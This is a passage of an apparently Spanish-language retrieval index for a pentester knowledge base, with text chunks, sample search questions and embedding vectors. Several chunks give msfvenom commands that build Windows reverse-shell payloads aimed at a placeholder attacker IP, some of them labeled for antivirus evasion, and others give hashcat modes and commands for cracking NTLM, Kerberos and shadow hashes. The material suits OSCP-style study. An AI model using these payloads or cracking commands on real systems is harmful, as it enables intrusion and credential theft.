0.02168, -0.06098, -0.07987, 0.02681, 0.0035, 0.03992, -0.0193, -0.03845, 0.03722, -0.05473, -0.07553, 0.00793, -0.03905, -0.0588, -0.02596, 0.02209, 0.06321, -0.0037, 0.02034, -0.03383]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Formatos (-f) segΓΊn el caso\n```\nexe ejecutable Windows dll DLL hijacking / Exploits conocidos\nraw shellcode crudo (B0F) py para tu script de Buffer Overflow\npsh / powershell hta-psh Client-side attacks\naspx / war / jsp webshells para upload\nelf ejecutable Linux\n```", "indexar": "cuΓ‘l es la diferencia entre los formatos ejecutables para Windows y Linux?", "v": [0.05707, 0.04194, -0.01565, -0.00663, 0.09225, -0.0892, -0.09769, 0.00427, -0.08402, -0.12563, -0.05018, -0.12751, -0.02397, -0.06829, 0.01662, -0.07665, -0.06364, -0.14298, -0.09648, -0.12266, -0.06885, -0.04712, -0.11529, -0.00839, 0.014, 0.03236, 0.05495, -0.01529, -0.04083, 0.02294, -0.02079, 0.06327, 0.05762, -0.03702, 0.01209, 0.12958, -0.02005, 0.01683, 0.01949, 0.14834, 0.07463, 0.09895, -0.04768, 0.03988, -0.0118, -0.15031, 0.02817, -0.00901, 0.04861, -0.151, 0.07126, 0.07111, -0.0875, -0.0722, 0.06591, -0.11889, 0.16814, -0.10835, 0.0726, 0.0444, -0.09305, 0.01081, -0.01956, -0.01018, 0.08596, -0.01462, -0.0289, -0.06544, 0.00559, 0.05324, -0.06189, 0.0707, 0.00083, 0.00465, 0.03584, 0.07228, -0.13258, 0.0483, 0.05626, 0.00378, 0.08531, -0.01475, -0.03686, -0.01562, -0.02822, -0.18257, -0.05005, -0.03153, -0.03207, -0.03106, 0.11773, 0.01603, -0.02969, 0.12149, 0.05095, -0.04482, 0.03756, 0.06534, 0.00554, 0.05431, -0.03163, 0.05369, -0.15249, 0.12144, 0.01027, 0.06366, -0.00888, -0.05715, -0.02958, -0.09604, 0.06359, 0.07576, -0.00052, 0.00802, -0.09884, -0.08896, -0.04956, -0.05909, 0.02766, 0.00655, -0.09065, 0.04189, -0.12815, 0.04424, 0.00684, -0.04552, -0.0552, 0.12618, -0.08584, 0.01123, 0.03386, -0.08472, -0.04033, -0.00092, -0.03473, 0.06064, 0.04114, -0.07377, 0.02506, -0.0872, 0.15141, 0.05935, 0.09214, 0.03979, 0.08197, -0.03722, 0.03498, -0.04824, -0.0872, -0.01998, 0.03366, 0.0006, -0.00617, -0.01954, -0.11295, -0.07066, -0.03466, 0.04261, -0.02648, 0.03199, 0.00894, -0.01985, 1e-05, -0.05997, -0.02927, -0.02749, -0.05893, 0.04632, 0.08306, -0.01775, 0.0223, 0.09568, -0.07531, -0.03282, 0.01125, -0.07313, -0.00227, -0.03962, 0.00821, 0.00519, -0.07617, 0.03881, -0.01864, -0.00757, 0.0012, 0.02597, -0.07756, 0.03884, -0.09029, 0.01685, -0.02623, 0.02703, 0.00952, -0.06216, -0.01815, -0.00651, -0.04523, -0.03819, 0.02761, 0.06325, -0.11117, 0.00078, -0.02595, -0.05932, 0.10156, 0.02632, -0.09043, 0.06515, 0.01023, 0.07754, 0.00425, -0.01693, 0.00037, -0.05126, -0.03493, -0.0424, 0.06459, 0.00824, 0.08096, 0.01699, -0.01734, 0.02395, 0.08982, -0.0496, -0.01696, -0.03337, -0.02451, -0.00425, -0.03563, -0.01893, 0.02094, 0.06002, 0.01909, -0.01106, 0.01258, 0.03433, 0.04235, -0.02975, -0.02058, -0.05806, 0.00217, 0.08459, -0.06076, -0.07879, -0.06987, -0.03515, -0.06818, 0.02139, -0.03496, -0.05793, -0.03811, 0.0245, 0.0371, -0.02279, -0.1, -0.00459]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Ejemplos\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f exe -o rev.exe\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\" -f py\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ AV evasion\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta\n```\n- Encoders (`-e x86/shikata_ga_nai`) ofuscan, **no** evaden AV moderno por sΓ­ solos β†’ ver AV evasion.\n\nRelacionado: Reverse shell Β· Metasploit Β· OSCP MOC", "indexar": "que programa sirve para crear shells reversas en Windows?", "v": [0.11027, -0.0363, -0.05061, -0.09792, 0.0228, -0.11002, -0.10572, -0.10745, 0.08023, -0.12759, -0.05524, -0.09933, -0.01971, -0.15148, -0.00375, 0.01128, -0.07814, -0.09804, 0.05987, 0.09688, -0.02393, -0.06634, -0.07508, -0.04211, -0.08914, 0.04243, 0.01004, -0.05075, -0.11537, 0.04827, -0.0179, -0.0583, -0.02928, -0.11274, -0.02923, 0.06209, -0.05528, 0.00066, 0.04078, 0.11338, 0.05099, 0.12872, -0.02007, 0.16601, 0.06355, -0.0358, 0.10406, -0.06144, 0.03068, 0.03373, -0.02788, 0.01651, -0.09483, 0.04403, 0.12989, -0.12135, 0.02278, -0.1783, -0.07237, 0.00485, -0.08399, 0.12804, -0.00447, 0.00166, 0.04798, -0.09044, -0.0053, -0.06605, 0.02879, 0.05454, -0.08287, -0.00738, 0.11007, -0.0162, -0.02958, 0.02376, -0.0609, -0.01684, 0.04927, -0.07363, -0.0435, -0.01494, 0.00167, -0.01951, 0.04171, -0.08347, -0.05564, -0.0036, 0.01313, -0.1211, 0.02532, 0.02406, -0.04353, 0.14508, 0.06631, -0.0763, 0.02438, 0.04351, -0.01668, 0.14744, -0.04844, -0.16271, -0.03521, 0.12681, -0.0802, 0.14561, -0.00161, -0.06117, -0.05795, 0.11847, 0.03229, 0.0066, -0.00602, 0.01632, -0.02572, 0.0015, 0.00114, -0.0152, 0.08713, 0.04244, -0.04183, -0.00376, -0.10795, 0.04039, -0.00409, 0.0117, -0.08911, 0.10818, -0.07522, 0.08789, 0.04566, 0.0235, -0.07123, 0.01859, -0.08005, 0.01086, 0.06953, 0.01279, 0.03953, -0.09551, 0.08327, 0.14303, 0.03626, 0.01112, -0.03737, -0.02117, 0.07744, -0.01704, -0.03675, -0.00106, 0.02136, 0.04429, -0.04362, 0.03826, -0.11803, -0.06045, -0.00623, 0.07075, 0.01747, 0.01161, -0.01945, 0.03343, 0.00554, -0.02372, 0.04928, -0.06441, -0.09827, 0.04629, 0.10834, 0.01473, -0.06423, 0.06337, 0.04212, -0.07139, 0.00501, 0.04645, 0.04203, -0.03294, -0.01435, -0.01757, -0.07876, 0.01646, 0.06445, -0.03977, -0.07628, -0.05111, -0.04151, 0.10714, -0.0335, -0.01178, -0.06622, -0.02466, 0.02497, -0.00832, -0.02266, 0.03653, 0.00086, -0.04237, 0.08511, -0.00171, -0.03344, 0.02244, 0.01326, -0.05269, 0.0613, 0.11687, -0.05541, 0.02493, 0.07063, 0.06347, 0.00287, 0.01169, -0.00321, 0.06659, -0.03455, -0.0587, 0.04507, 0.01525, 0.04086, 0.07874, -0.0046, -0.03281, -0.01815, 0.03141, 0.00721, -0.08979, -0.00835, 0.01409, 0.02113, 0.00801, 0.01131, 0.00259, 0.01282, -0.00829, -0.03536, -0.01354, 0.00525, -0.02964, 0.02854, -0.03943, -0.07392, 0.08036, -0.02843, -0.10194, 0.00465, 0.00531, -0.01035, -0.00226, 0.00937, 0.00801, -0.05069, 0.02092, 0.00604, -0.03435, 0.02726, 0.04898]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Ejemplos\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f exe -o rev.exe\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\" -f py\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ AV evasion\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta\n```\n- Encoders (`-e x86/shikata_ga_nai`) ofuscan, **no** evaden AV moderno por sΓ­ solos β†’ ver AV evasion.\n\nRelacionado: Reverse shell Β· Metasploit Β· OSCP MOC", "indexar": "cual es la mejor alternativa gratuita a metasploit para generar exploits?", "v": [-0.11471, -0.016, -0.13768, -0.10157, -0.00541, 0.04429, -0.10535, 0.00205, -0.25054, -0.10279, -0.03428, -0.03744, 0.00353, 0.06489, 0.08824, -0.09916, 0.06154, -0.08375, 0.11355, -0.12194, -0.08372, -0.06654, -0.08216, -0.2095, -0.07594, 0.05279, -0.05419, 0.03224, -0.02774, 0.13684, 0.00111, 0.00064, -0.05626, -0.09369, -0.00045, 0.02008, 0.09523, 0.07802, 0.15584, -0.01793, -0.0323, -0.01514, -0.10694, 0.01558, 0.15255, -0.14046, -0.03635, 0.05114, -0.03293, -0.02999, 0.02429, -0.07637, -0.06659, 0.01557, 0.0012, -0.01446, 0.0662, -0.14109, -0.151, -0.02033, -0.02793, 0.00167, 0.03123, 0.00038, -0.0077, -0.07847, -0.0439, 0.01304, -0.12045, 0.14348, 0.06994, 0.0628, 0.07522, -0.00769, -0.04764, 0.0047, 0.02604, -0.07882, -0.0184, 0.11875, 0.00036, -0.0645, -0.03949, 0.0866, -0.12872, -0.03298, 0.0238, -0.00807, 0.06485, 0.00669, -0.00609, -0.04835, 0.03612, 0.02548, -0.03516, -0.13705, 0.07607, 0.04336, 0.00046, 0.14487, -0.02731, -0.04409, -0.06157, 0.03511, 0.03073, 0.04208, -0.13218, 0.1036, -0.10647, -0.03123, 0.02045, -0.00227, 0.04758, 0.09203, 0.09081, -0.03622, -0.01533, -0.03235, -0.01117, -0.04205, -0.14413, -0.00495, -0.06043, -0.03423, 0.01117, 0.0794, 0.07715, -0.04718, 0.00337, -0.0156, 0.06214, 0.0188, 0.03886, -0.00908, -0.1013, -0.12068, 0.13426, -0.08255, -0.04595, -0.00062, -0.01215, 0.01869, 0.00062, 0.00298, -0.05976, -0.0593, 0.02319, -0.0089, 0.05833, -0.07402, -0.04459, -0.06476, -0.02257, 0.01616, -0.04888, -0.0258, -0.07778, 0.03819, 0.01147, 0.09118, 0.0824, -0.06359, -0.03517, 0.0064, -0.05053, -0.0307, 0.07275, 0.01153, -0.05291, 0.04838, 0.01869, 0.05481, 0.08173, -0.05691, 0.05836, -0.09046, 0.03218, -0.01877, 0.0181, -0.00635, -0.02054, -0.02988, 0.03893, -0.02579, 0.00785, -0.0786, 0.07319, 0.00106, 0.045, -0.02302, 0.06589, -0.02708, 0.00377, -0.01129, 0.02282, -0.04227, 0.01165, -0.03398, -0.04306, 0.01631, 0.01328, -0.07997, -0.01164, -0.02764, 0.03378, -0.02639, -0.01904, 0.00377, -0.02406, 0.00549, -0.00538, 0.07262, 0.00149, -0.0543, -0.09107, 0.02106, -0.00866, 0.02276, -0.02788, -0.03025, 0.02834, -0.01784, -0.00235, -0.02752, -0.01324, 0.06021, -0.05175, 0.02595, -0.06989, -0.01926, 0.00998, -0.00487, 0.05817, 0.04996, -0.03935, -0.01154, 0.02184, 0.03637, 0.05785, -0.04535, 0.01863, 0.02374, 0.03608, 0.00511, 0.00668, 0.03575, -0.01187, -0.02743, -0.01914, -0.04402, -0.01555, -0.01385, -0.02822, 0.04973, 0.04486, 0.01854]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Ejemplos\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f exe -o rev.exe\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\" -f py\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ AV evasion\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta\n```\n- Encoders (`-e x86/shikata_ga_nai`) ofuscan, **no** evaden AV moderno por sΓ­ solos β†’ ver AV evasion.\n\nRelacionado: Reverse shell Β· Metasploit Β· OSCP MOC", "indexar": "con que herramienta puedo ofuscar un payload para evitar antivirus?", "v": [0.05967, 0.02451, -0.19011, -0.14171, -0.04243, 0.00667, 0.02359, 0.00821, -0.14498, 0.02535, -0.01292, -0.09823, -0.01299, 0.09037, -0.03393, 0.06784, -0.01181, -0.06446, -0.01883, 0.14705, 0.0302, -0.05097, -0.11547, -0.0072, -0.03543, 0.16094, -0.05251, 0.03423, -0.27084, 0.02681, -0.07354, 0.13105, 0.06013, -0.01436, -0.11171, 0.01182, -0.07467, 0.14772, 0.04392, 0.07537, 0.0479, 0.10513, -0.07765, 0.04935, 0.03658, -0.00018, -0.0213, -0.02963, 0.10344, -0.03273, 0.0165, -0.10276, -0.04424, -0.03208, -0.03654, -0.08483, 0.1656, -0.09133, 0.03491, -0.05574, -0.04896, 0.15366, -0.09006, 0.0658, -0.03619, -0.06722, 0.00079, -0.02899, -0.10463, 0.03296, 0.00838, 0.01577, 0.0314, 0.003, -0.01932, -0.07714, -0.03528, 0.07981, 0.05576, 0.07836, 0.08121, 0.00837, 0.01109, 0.04995, -0.05807, -0.13902, 0.01749, -0.01503, 0.02144, -0.14401, 0.01086, 0.05206, -0.07114, 0.10691, -0.00488, -0.00189, 0.13809, -0.01097, -0.04687, -0.03318, 0.09533, -0.02513, -0.03903, 0.07436, 0.03195, -0.06044, -0.0301, -0.06917, -0.02841, -0.05293, 0.09456, -0.03028, 0.0645, 0.01, -0.09163, -0.04342, -0.00248, 0.0324, 0.06467, -0.07013, 0.00667, 0.02645, -0.10273, 0.02052, 0.08084, -0.04461, -0.06944, 0.15317, -0.03184, -0.04557, -0.01051, -0.02076, -0.06163, 0.0021, -0.08121, 0.00772, 0.03478, -0.1402, -0.04294, 0.01377, 0.07528, 0.10085, 0.033, 0.00728, 0.04793, 0.03233, -0.0372, -0.04557, -0.06982, -0.02201, 0.12025, 0.02078, -0.01696, 0.03008, -0.01905, 0.03271, 0.05677, 0.01156, 0.01851, -0.0027, -0.02839, 0.03281, 0.03877, 0.01453, -0.03874, -0.05284, 0.02811, -0.01729, -0.02565, 0.08245, 0.05155, 0.02136, 0.05568, -0.10006, -0.01081, -0.05469, -0.03901, -0.02855, 0.00054, -0.08773, -0.05852, -0.0007, -0.04944, -0.00991, 0.046, -0.07382, -0.00108, 0.02379, 0.0417, 0.04273, -0.01255, 0.07071, 0.01556, -0.06339, 0.01896, -0.03253, -0.03138, -0.04029, 0.0494, 0.0522, -0.00072, -0.07144, -0.07808, -0.039, 0.04217, 0.00881, -0.03554, -0.00258, 0.04414, 0.00568, 0.12825, -0.04733, 0.05946, -0.04296, -0.03727, -0.02896, -0.03039, 0.00249, -0.00628, 0.02384, 0.05899, 0.02008, 0.07028, -0.03951, -0.03131, 0.04559, 0.01013, 0.01959, 0.09728, -0.04437, -0.00054, -0.00904, 0.01378, -0.02322, 0.04532, -0.01273, -0.00201, -0.05249, -0.05849, 0.05175, -0.02316, -0.00027, 0.01738, -0.10555, -0.07675, -0.05094, 0.0033, -0.00775, -0.01613, -0.03179, -0.02506, 0.05505, 0.02583, -0.00637, 0.02946, 0.01104]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Cracking de contraseΓ±as\n\n> Generar wordlists y romper hashes/credenciales offline y online. Fuente: oscp.trastero.org/passwords.", "indexar": "que programa me sirve para generar listas de contraseΓ±as", "v": [0.1608, 0.06136, -0.11359, -0.21442, 0.00714, -0.1794, -0.02072, -0.11541, -0.08506, -0.12216, -0.00918, -0.01488, 0.00651, -0.15909, 0.04138, 0.05014, 0.10325, -0.08868, 0.12725, 0.12408, 0.00015, 0.02296, -0.01183, -0.10942, -0.07771, -0.04153, 0.07674, -0.09396, -0.06825, 0.05015, 0.0379, -0.05242, 0.02496, -0.12578, 0.01349, 0.12093, 0.04506, 0.09894, -0.0206, 0.0691, 0.09787, 0.07853, -0.13008, 0.07061, -0.03011, -0.05546, 0.08549, 0.05754, 0.07265, -0.01246, -0.05689, -0.05047, -0.0284, -0.01083, 0.02076, -0.11175, -0.04401, -0.104, -0.06969, 0.01178, -0.13959, 0.02682, 0.08092, 0.0124, -0.09042, -0.02011, 0.08391, 0.03603, -0.08923, 0.07076, -0.05619, 0.03696, 0.06093, -0.0375, -0.01142, -0.00328, 0.03923, -0.04007, -0.03186, 0.09966, -0.063, -0.04672, 0.0599, 0.0521, -0.09967, 0.03751, 0.07148, -0.00645, 0.04068, -0.06536, 0.02579, 0.03515, 0.00472, 0.1173, 0.08528, -0.06367, 0.07279, 0.07353, -0.01519, 0.02827, 0.00629, -0.01802, -0.02692, 0.14389, -0.04609, 0.08271, 0.04919, 0.02608, -0.03725, 0.00018, 0.03882, -0.00369, -0.05334, -0.04407, -0.05004, -0.00535, -0.03455, -0.06071, 0.08274, -0.03161, -0.07594, 0.02132, -0.03855, 0.04433, 0.08175, 0.0996, 0.02132, 0.07125, -0.09129, 0.00739, 0.00663, 0.03574, -0.0379, -0.04338, -0.0648, -0.05787, 0.00379, -0.08586, -0.04191, 0.00143, 0.02206, 0.07503, 0.03553, 0.03084, -0.00572, 0.02096, 0.07602, -0.06339, -0.01512, 0.03877, -0.01198, -0.02668, 0.01625, 0.0563, -0.07772, -0.0115, -0.02041, -0.09606, -0.05498, 0.12123, -0.0182, -0.02116, -0.08017, -0.02192, -0.00059, 0.0069, 0.0243, 0.08439, 0.10446, 0.11245, 0.00807, 0.09732, 0.08504, -0.11738, -0.04169, -0.01891, -0.00211, -0.10349, -0.00668, -0.04335, -0.11342, -0.00919, 0.0433, 0.0161, -0.01262, -0.05953, 0.03222, 0.02746, 0.00044, -0.00402, -0.0167, -0.01432, -0.06621, 0.01721, 0.01193, -0.01982, 0.01387, -0.01346, -0.00363, -0.12113, -0.01712, -0.02614, -0.03686, -0.02612, 0.04518, 0.10159, -0.06614, -0.05305, 0.02809, 0.0699, 0.04422, -0.00883, 0.01825, 0.00472, -0.07362, -0.08198, -0.04904, 0.03911, 0.04511, 0.01086, 0.0202, -0.00723, 0.02104, 0.08316, 0.00876, -0.05287, 0.01506, -0.0011, 0.06096, -0.00177, -0.01173, -0.01529, -0.00589, -0.03195, 0.06152, -0.03898, -0.09656, -0.03482, 0.00126, -0.06082, -0.04348, 0.06315, 0.02451, -0.08401, -0.037, 0.00261, 0.00066, -0.00781, 0.01955, -0.01204, -0.10332, 0.02722, 0.01494, 0.00877, 0.06926, -0.02561]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Cracking de contraseΓ±as\n\n> Generar wordlists y romper hashes/credenciales offline y online. Fuente: oscp.trastero.org/passwords.", "indexar": "con que puedo realizar el cracking de hashes en modo offline", "v": [0.1478, 0.10203, -0.21506, 0.02791, -0.02666, -0.06456, -0.10607, 0.16017, 0.00084, 0.02462, -0.10408, -0.04796, 0.001, -0.03649, 0.0928, 0.04133, -0.02765, 0.05655, -0.08214, 0.09631, -0.06188, -0.01508, -0.12475, 0.03899, 0.0807, -0.0895, -0.07096, 0.20861, -0.3201, -0.08253, -0.05935, -0.01604, -0.03151, 0.07132, -0.00586, 0.00851, 0.00654, 0.04538, 0.06656, 0.04411, -0.01678, 0.0738, -0.14419, 0.05326, 0.03547, -0.00819, -0.07594, 0.0114, -0.03509, 0.03167, -0.05167, -0.12503, -0.15741, -0.03428, -0.0152, -0.1182, 0.09074, -0.08474, -0.03585, -0.14691, -0.06534, 0.02297, -0.03255, -0.0514, 0.02999, -0.02348, 0.02609, 0.08687, -0.07358, 0.11926, -0.0083, 0.06314, -0.02937, -0.07265, 0.04678, 0.05702, 0.01288, -0.00959, 0.02373, 0.04593, 0.00318, 0.00807, 0.08786, 0.058, -0.13464, 0.03046, -0.0441, -0.11093, -0.00432, 0.09659, -0.01337, 0.09753, -0.02764, -0.04792, -0.10774, -0.04132, 0.0802, -0.04215, -0.04832, -0.01347, -0.06009, -0.02176, -0.09041, 0.04952, -0.07654, -0.01716, 0.04509, 0.00944, 0.07042, 0.00474, 0.08338, -0.02151, -0.05576, 0.00063, -0.03377, 0.02041, 0.02483, 0.01304, 0.02785, 0.05556, -0.11446, 0.00511, 0.05564, 0.02997, 0.06837, 0.01036, -0.07001, 0.03923, -0.04358, -0.05275, 0.04228, -0.00446, -0.02087, -0.03981, -0.0292, 0.01449, 0.07055, -0.01519, 0.05692, -0.09115, 0.03865, -0.00613, -0.01021, 0.02894, 0.09875, -0.02778, -0.06571, -0.0609, -0.10856, -0.07608, 0.04248, 0.04786, -0.04182, 0.01165, -0.08485, 0.01736, -0.01298, -0.02688, 0.01873, 0.0659, -0.08442, 0.02073, -0.0194, 0.04996, -0.06013, -0.01341, -0.02944, 0.00674, -0.00419, -0.03442, -0.00141, 0.03495, -0.01562, -0.09265, 0.00361, 0.01451, -0.02789, 0.00387, -0.00174, -0.07742, -0.02738, -0.06261, -0.003, -0.00433, -0.05381, -0.00011, 0.02078, -0.01261, -0.01483, -0.01784, 0.00983, 0.00578, -0.11831, 0.0969, 0.06081, -0.00871, 0.05726, 0.05858, 0.02134, -0.08977, -0.04677, -0.07276, 0.03011, -0.08717, 0.00046, 0.02051, -0.03299, -0.04479, -0.02407, 0.01388, 0.0206, -0.04798, 0.02604, 0.00699, 0.00286, 0.05505, -0.03573, -0.02529, -0.07399, -0.01403, 0.00505, 0.03115, 0.05861, 0.01297, 0.00175, 0.04409, 0.00073, 0.00403, -0.00713, 0.00502, 0.01476, -0.02352, 0.01394, 0.01009, 0.0285, -0.01113, 0.02189, 0.04459, -0.13, 0.00563, -0.0014, -0.00502, 0.06231, 0.03991, -0.00564, -0.02765, -0.10307, 0.05723, -0.02989, -0.04527, -0.0517, 0.0394, 0.03552, 0.05595, -0.05646, 0.00804]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Cracking de contraseΓ±as\n\n> Generar wordlists y romper hashes/credenciales offline y online. Fuente: oscp.trastero.org/passwords.", "indexar": "cual es una herramienta para romper credenciales tanto online como offline", "v": [-0.07173, 0.06572, -0.15725, -0.01799, 0.00011, -0.09619, 0.00545, 0.0646, -0.04175, -0.1253, -0.09902, -0.06353, 0.06157, -0.06324, 0.10211, -0.012, 0.02521, -0.04247, 0.02637, 0.07251, -0.11399, -0.01315, -0.03918, -0.06651, 0.03365, -0.082, 0.00483, 0.04718, -0.12641, 0.00289, -0.00845, -0.04303, 0.04868, -0.02337, -0.02317, -0.06876, -0.04739, 0.06501, -0.08365, 0.08312, 0.06006, 0.06611, -0.09743, 0.11292, 0.04371, 0.03334, -0.10488, 0.07555, -0.02371, 0.06443, -0.10735, -0.13385, -0.0862, -0.02451, 0.01749, -0.134, 0.20977, -0.14307, 0.13089, -0.10552, -0.1733, -0.04133, -0.04592, -0.09985, 0.02087, -0.02213, -0.04348, -0.05346, -0.18771, 0.10831, -0.02332, 0.03, 0.02007, -0.05915, -0.01617, 0.0402, 0.00942, 0.05757, 0.04747, -0.05314, 0.09516, -0.00664, 0.01209, 0.10209, -0.05275, -0.07647, 0.07122, -0.04358, -0.01933, 0.04484, -0.03391, 0.11079, -0.06304, -0.04817, -0.03707, -0.08839, 0.04522, -0.10143, -0.00012, 0.01363, 0.03352, 0.00905, -0.12356, -0.01972, -0.07707, -0.00513, -0.04835, 0.03634, -0.03096, -0.0096, 0.1023, 0.03766, 0.01207, 0.07419, 0.04169, 0.08476, -0.03552, -0.03597, -0.00644, -0.02769, 0.02458, 0.05445, -0.00872, -0.04388, 0.00674, 0.05975, -0.1002, 0.02154, -0.04036, -0.09402, -0.04036, -0.05321, -0.05722, -0.04209, -0.00859, -0.01718, -0.00205, -0.12523, -0.00808, -0.10404, 0.01335, -0.05167, -0.08028, -0.056, 0.08264, -0.02732, 0.02064, -0.08242, -0.06698, -0.02892, -0.00049, 0.09334, -0.06458, 0.03289, -0.05567, 0.06803, -0.07164, -0.01428, -0.05137, 0.04451, -0.05759, -0.05131, 0.12441, -0.02085, -0.04277, -0.07325, -0.00433, 0.01538, 0.0559, 0.0305, 0.03758, 0.04228, 0.00011, -0.0792, -0.00921, -0.0186, -0.03208, -0.03117, -0.01735, -0.09817, -0.03558, -0.0376, -0.02701, -0.0237, -0.02925, -0.03051, 0.00515, -0.02644, -0.02899, 0.06135, 0.01788, -0.01099, -0.12467, 0.0259, 0.07866, 0.02299, 0.01431, -0.00066, 0.07878, -0.0417, -0.1188, -0.10109, -0.00369, -0.05805, -0.00532, 0.05298, 0.03247, -0.04572, -0.04662, 0.0492, 0.01214, -0.09003, 0.03223, -0.08064, -0.00918, -0.0255, -0.01496, -0.07088, -0.05333, -0.00664, 0.03265, -0.03806, 0.03355, -0.00186, -0.00275, 0.07216, 0.04057, -0.00042, -0.02343, -0.02848, 0.01661, -0.09527, -0.0058, -0.01717, 0.03395, -0.04346, 0.08716, 0.00572, -0.11162, -0.03173, -0.02711, 0.05315, 0.02899, -0.02947, -0.02766, -0.01615, -0.07634, 0.02354, -0.04995, -0.06175, -0.0745, 0.02534, 0.05963, 0.01294, 0.0144, -0.01399]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## hashcat β€” los modos que importan\n```\n-m 0 MD5 -m 100 SHA1 -m 1000 NTLM\n-m 1800 sha512crypt ($6$, /etc/shadow)\n-m 5600 NetNTLMv2 (capturado con Responder β†’ Client-side attacks)\n-m 13100 Kerberoast TGS ($krb5tgs$) β†’ Kerberoasting\n-m 18200 AS-REP ($krb5asrep$) β†’ AS-REP Roasting\n-m 22000 WPA-PBKDF2 -m 13400 KeePass\n```\n```bash\nhashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule\n```", "indexar": "quΓ© herramienta sirve para romper contraseΓ±as MD5 y SHA1?", "v": [0.00294, -0.06924, -0.17418, -0.1365, -0.13931, -0.10483, -0.10203, -0.04872, -0.02072, -0.00417, -0.03319, 0.02387, 0.14267, -0.26208, -0.00496, -0.00027, 0.08862, -0.07757, -0.02723, 0.13906, 0.02505, -0.02566, -0.06756, -0.06308, -0.06947, -0.02468, -0.02937, 0.02479, -0.24047, 0.01971, 0.03324, -0.00749, 0.02157, 0.05635, -0.08771, 0.08491, -0.02541, 0.06803, 0.00485, 0.10104, 0.05695, 0.08623, -0.15215, 0.05994, 0.08017, -0.05436, 0.00537, 0.07442, 0.07264, 0.15152, -0.08618, -0.06834, -0.11588, 0.01647, -0.00818, -0.06726, 0.1679, -0.04186, -0.00179, -0.00122, -0.18303, 0.02253, -0.04444, -0.04164, -0.08303, -0.07193, -0.02466, -0.03698, -0.05079, 0.09329, -0.09726, 0.02262, -0.01406, -0.00014, -0.07637, 0.08978, -0.0048, -0.0388, 0.04511, 0.10083, -0.00416, 0.03511, -0.05183, 0.00707, -0.10318, -0.00635, 0.06918, -0.0613, 0.07118, -0.08203, 0.00358, 0.09089, -0.01148, 0.02143, 0.00588, -0.06146, 0.04612, -0.06274, -0.05284, -0.0227, 0.07084, -0.01433, -0.07102, 0.08656, -0.03271, -0.0223, -0.02634, -0.03848, 0.00878, -0.06452, 0.1149, 0.04187, -0.02967, -0.00585, -0.02767, 0.04468, -0.04953, -0.05286, -0.04965, -0.0202, 0.03556, 0.05288, -0.05068, -0.00259, 0.0228, 0.04751, -0.0621, 0.08045, -0.00566, -0.07388, -0.00192, -0.08374, -0.13277, 0.00046, 0.00357, 0.03048, 0.06407, -0.12365, -0.05038, -0.05551, 0.01303, -0.03685, -0.00569, 0.00681, 0.06514, 0.04763, 0.09584, -0.02133, -0.00115, 0.02393, 0.0008, -0.03043, -0.02953, -0.0031, -0.02177, 0.04641, -0.06086, -0.07067, -0.08791, 0.1212, -0.02426, -0.00404, 0.05022, 0.04675, -0.01216, -0.06623, 0.06726, 0.05088, 0.10005, 0.11181, 0.07983, 0.02756, 0.02848, -0.0254, 0.00154, -0.02221, -0.01421, -0.07262, -0.04379, -0.10667, -0.01271, -0.01512, -0.00963, 0.00614, 0.05167, -0.06117, 0.04532, -0.06068, -0.00432, -0.07541, 0.0018, 0.02729, -0.02658, 0.00464, 0.00354, 0.01242, 0.01092, -0.02613, 0.03383, -0.02734, -0.04395, -0.00918, -0.01773, -0.04685, 0.06545, 0.05889, -0.0518, -0.10218, -0.01253, 0.03952, 0.05094, 0.01871, 0.02426, 0.0157, -0.08283, -0.06688, -0.02085, 0.0142, -0.01831, 0.0283, 0.01574, 0.01268, 0.02793, -0.0157, 0.04146, 